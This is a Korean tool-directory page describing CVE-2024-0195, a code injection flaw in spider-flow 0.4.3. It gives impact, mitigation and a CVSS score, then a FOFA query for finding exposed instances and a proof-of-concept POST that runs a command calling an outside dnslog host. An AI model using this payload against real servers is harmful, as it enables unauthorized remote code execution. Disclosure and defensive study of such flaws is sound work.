Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 코드 생성의 부적절한 제어 ('Code Injection') | Kitploit
도구/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 코드 생성의 부적절한 제어 ('Code Injection')

저장소 보기
532년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-0195 코드 생성 제어 부적절 ('코드 인젝션')

요약

CVE-2024-0195는 spider-flow 0.4.3 웹 애플리케이션, 특히 FunctionController.java 파일의 FunctionService.saveFunction 함수에서 발견된 심각한 코드 인젝션 취약점입니다. 공격자는 원격으로 악성 코드를 주입하여 서버에서 실행시킬 수 있습니다. 이를 통해 애플리케이션이 완전히 손상될 수 있습니다.

영향

이 취약점은 취약한 spider-flow 애플리케이션이 호스팅된 서버에서 원격 코드 실행을 허용하므로 매우 심각합니다. 공격자는 서버를 완전히 손상시키고, 민감한 데이터를 도용하며, 악성코드나 암호화폐 채굴기를 설치하고, 네트워크 내에서 추가 공격에 사용할 수 있습니다. 애플리케이션과 서버의 기밀성, 무결성 및 가용성이 모두 심각하게 영향을 받습니다.

패치

패치 버전이 명시적으로 언급되지 않았으므로 현재로서는 패치 적용이 불가능한 것으로 보입니다. 취약점이 공개적으로 공개되었고 익스플로잇이 이용 가능하므로 즉각적인 완화 조치가 중요합니다.

완화 조치

공식 패치가 출시될 때까지 spider-flow 0.4.3을 즉시 오프라인으로 전환하거나 신뢰할 수 있는 네트워크/사용자로만 액세스를 제한해야 합니다. 웹 애플리케이션 방화벽이나 다른 입력 검증 제어를 구성하여 임시 완화 조치로 코드 인젝션 공격 시도를 탐지 및 차단할 수 있습니다. 그러나 이는 완전한 해결책이 아니며, 수정된 릴리스가 제공되는 즉시 취약한 버전을 업그레이드해야 합니다.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

익스플로잇

FOFA : app="spiderflow"

✔ 개념 증명

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
도구 다운로드